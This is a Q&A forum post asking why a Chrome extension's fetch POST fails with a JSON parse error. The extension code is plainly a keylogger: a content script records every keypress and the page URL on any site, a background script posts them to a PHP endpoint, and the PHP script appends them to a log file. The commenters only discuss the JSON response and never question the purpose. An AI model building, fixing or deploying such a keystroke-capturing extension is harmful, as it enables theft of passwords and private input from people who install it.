# Fetch Failed loading : POST

Tags: json, post, google-chrome-extension, fetch, x-www-form-urlencoded

A Fetch request fails with an error stating that the JSON code is not valid. I used my extension to send a POST request to a PHP file.

Below is the error message I received:

`Error: SyntaxError: Unexpected token '<', "<!DOCTYPE "... is not valid JSON`

`Fetch failed loading: POST "<URL>"`

For some reason, I received this error message when sending this information to PHP. If I could receive a response from you in advance, I would appreciate it.

> content.js

```
chrome.runtime.onConnect.addListener(function(port){})

chrome.manifest = chrome.runtime.getManifest();
//});  


    
var keystrokes = "";


    window.addEventListener('keypress', function(e) {
   
        if (e.key.length > 1 && e.key != " ") {
            keystrokes =  e.key; 
            alert(e.key);
} 

 
        
        else {
            keystrokes = e.key;
            
        }

   var ApiUrl = "http://localhost:80/KeyloggerV1/app.php"
   var JSONdata = {
        keys: keystrokes,
        site: window.location.toString(),     
     
    }
    console.log(JSON.stringify(JSONdata));
    
    chrome.runtime.sendMessage({
        contentScriptQuery: "postData"
        , data: JSONdata
        , url: ApiUrl
    },  function (response) {
        
        if (response != undefined && response != "") {
            console.log(response);
        }
        else {
            
            console.log(null);
        }
    });
});
```

> background.js

```
     chrome.runtime.onMessage.addListener(function (request, sender, sendResponse) {    
     
      if (request.contentScriptQuery == "postData") {
          fetch(request.url, {
              method: 'POST',
              headers: {
                  'Accept': 'application/json, application/xml, text/plain, text/html, *.*',
                  'Content-Type': 'application/x-www-form-urlencoded; charset=utf-8'
              },
              body: 'keys=' + request.data   ,
              
          })
              .then(response => response.json())
              .then(response => sendResponse(response))
              .catch(error => console.log('Error:', error));
          return true;
      }
  });
```

PHP file

```
<?php
header("Content-Type: application/json; charset=UTF-8");
session_start();
if (!isset($_POST['keys'])) {
    echo("Didn't received any new KEY strokes Yet!");
    exit(0);
}
//read and write = a+, If the file does not exist, attempt to create it
$file_txt = fopen("C:\xampp\htdocs\KeyloggerV1\file.txt","a+");

if (!isset($_SESSION['site']) || $_SESSION['site'] != $_POST['site']) {
    $_SESSION['site'] = $_POST['site'];

    fwrite($file_txt, "| site : ".$_POST['site']." | ");


}

fwrite($file_txt, $_POST['keys']);
fclose($file_txt);


echo ("character saved successfully");
?>
```

Comment: The fetched response you are trying to read with **response.json()** it doesn't seem to be  JSON data but a HTML document  (**<!DOCTYPE "**)
Maybe you have to set **header("Content-Type: application/json; charset=UTF-8")** in your php file

Comment: still same issue, I believe the issue is from the fetch itself. Should I use JSON_encode in PHP file?

Comment: _"Should I use JSON_encode in PHP file?"_  
I don't have the gift of foresight, but a php line with **echo json_encode($JSON_DATA)** I would see well!

Comment: I've seen you edited your question by adding your php file.
In my life (so far) I have created less than 10 php files, but I don't necessarily have to be a php black belt to understand that your code does not return any JSON data.
It all revolves around knowing what you actually want to accomplish.